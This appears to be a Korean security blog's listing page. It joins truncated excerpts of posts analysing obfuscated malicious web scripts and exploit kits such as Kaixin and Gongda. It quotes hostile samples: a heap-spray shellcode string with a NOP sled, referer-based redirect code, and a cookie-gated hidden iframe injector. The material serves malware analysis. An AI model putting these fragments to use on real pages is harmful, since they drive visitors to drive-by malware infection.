var memory;var nop = unescape("%u0b0b%u0b0b"); var SC=unescape("%u9090%u9090%u54eb%u758b%u8b3c%u3574%u0378%u56f5%u768b%u0320%u33f5%u49c9%uad41%udb33%u0f36%u14be%u3828%u74f2%uc108%u0dcb%uda03%ueb40%u3bef%u75df%u5ee7%u5e8b%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u038b%uc3c5%u7275%u6d6c%u6e6f%u642e%u6c6c%u4300%u5c3a%u2e6e%u6373%u0072%uc033%u0364%u3040%u0c78%u408b%u8b0c%u1c70%u8bad%u0840%u09eb%u40..
document.writeln(""); document.writeln("var referer=document.referrer;"); document.writeln("if (referer.indexOf(\"baidu\") >0 || referer.indexOf(\"google\") >0)"); document.writeln("location.replace(\"http:\/\/www.naver.com\");"); document.writeln("") 리퍼러에서 baidu나 google이 있으면 현재 페이지를 naver로 바꾸어 주는 스크립트입니다. 구글이나 바이두의 검색을 통해 유포지로 흘러들어온다면 다른페이지로 리디렉션 시킬 수 있지 않을까? 생각해봅니다.
url = test.html에 동일한 디렉토리에 test.html을 읽어들일 수있다. 해당 html에 악성코드 유포지로 트래픽을 유도하는 스크립트나 태그가 포함되어 있다면..? 이러한 부분들을 소스코드만 수집했다면, 악성인지 정상인지 어떻게 파악하면 좋을까. 고민해봐야 할듯.
개요 두번째 16진수 난독화 형태는 "\x"를 구분자 기호로 사용하는 유형이다. \x 구분자 기호는 자바스크립트 엔진이 사용하는 16진수 인식 기호다. 이러한 이유로 자바스크립트 함수 까지도 난독화가 가능하다. if (window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"]["\x69\x6e\x64\x65\x78\x4f\x66"]('\x6e\x62\x32\x32\x39\x3d') == -1) { var aWdHMqss1 = new window["\x44\x61\x74\x65"](); aWdHMqss1["\x73\x65\x74\x54\x69\x6d\x65"](aWdHMqss1["\x67\x65\x74\x54\x69\x6d\x65"]() ..
이번 난독화는 vbscript로 만들어진 난독화입니다. 실제 실행되는 html 소스가 역순으로 저장되어 있고, UTF-8로 볼 수 있는 특수문자가 포함되어 있습니다. 실제로 이 코드는 실행되지 않고 오류가 발생하지만, 공격을 위한 소스코드이며 분석해볼만큼 재미있는 형태이기 때문에 분석해 보았습니다. มี 라는 문자는 구글 번역기로 돌려본 결과 "태국어 : 있다" 라는 의미를 가지고 있습니다. 간단하게 xmp을 이용하여 난독화를 풀면 다음과 같은 결과를 볼 수 있습니다. vbscript이기 때문에 IE에서만 동작합니다. ???? 1. มี(UTF-8 문제로 ??로 표시됨)를 제거하는 구문이 존재하지 않음. 수동으로 제거.2. YT_u 변수는 "%u"를 의미함.3. 실행에 있어 잘못된 부분들 일부 수정 위 ..
Yszz 0.13 문자열이 포함되어 있고, Kaixin이라는 문자열을 이용하여 함수명을 사용하기에 아마 Kaixin 툴킷이라고 부르는 게 아닌가 싶습니다. Kaixin은 다음과 같은 의미를 가지고 있습니다. 난독화 형태는 split 형태도 보이고, hexdecimal 형태도 보이지만, 난독화 해제는 간단하게 끝납니다. 두번째 script가 시작한 후 바로 document.write("")를 이용한 후 실행하면 alert을 이용하는 것보다 더욱 깔끔하게 볼 수 있습니다. 난독화 해제 후 결과는 다음과 같습니다. 사용하는 취약점은 다음과 같이 추측됩니다. (유포지가 비활성화 상태라서 수집과 분석을 하지 못했습니다.) Java Exploit2onrPnGe.jpg : CVE-2011-3544q9lTKCs.jpg..
트래픽 통계수집은 통계를 통한 잠재고객의 유치 및 접근자에 맞는 서비스 제공등에 목적을 두고 있습니다. 그래서 대형 검색 사이트(구글, 야후, 얀덱스, 바이두 등)에서는 무료로 트래픽 통계수집 서비스를 제공하고 있습니다. (Google Analytics, ...) 공격자는 트래픽 길목에 유동인구수가 얼만큼 되는지, 자신의 공격 페이지에 접근한 사용자는 몇이고, 악성코드 감염된 수치와 비교하여 접근하였지만 감염되지 않은 수가 얼마인지 등 다양한 정보를 수집합니다. 일반적으로 국내 웹을 이용한 공격의 대부분은 공다팩 입니다. 공다팩은 레드킷이나 블랙홀과 다르게 랜더링 페이지가 없으며, 랜더링 페이지가 없다는 말은 곧 자체적으로 통계수집를 하지 못한다는 것을 의미합니다. 그래서 공다팩은 51yes, cnzz과..
16진수 값을 이용하여 만드는 Hexdecimal Obfuscation입니다. 간단하게 아스키 코드표의 16진수 값을 따라 난독화를 풀 수 있고, Malzilla 또는 Jsdetox 등 이용해서 난독화를 해제 할 수 있습니다. 난독화 if (document.cookie.indexOf('veatpr') == -1) { var expires = new Date(); expires.setTime(expires.getTime() + 12 * 60 * 60 * 1000); document.cookie = 'veatpr=Yes;path=/;expires=' + expires.toGMTString(); document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%27..
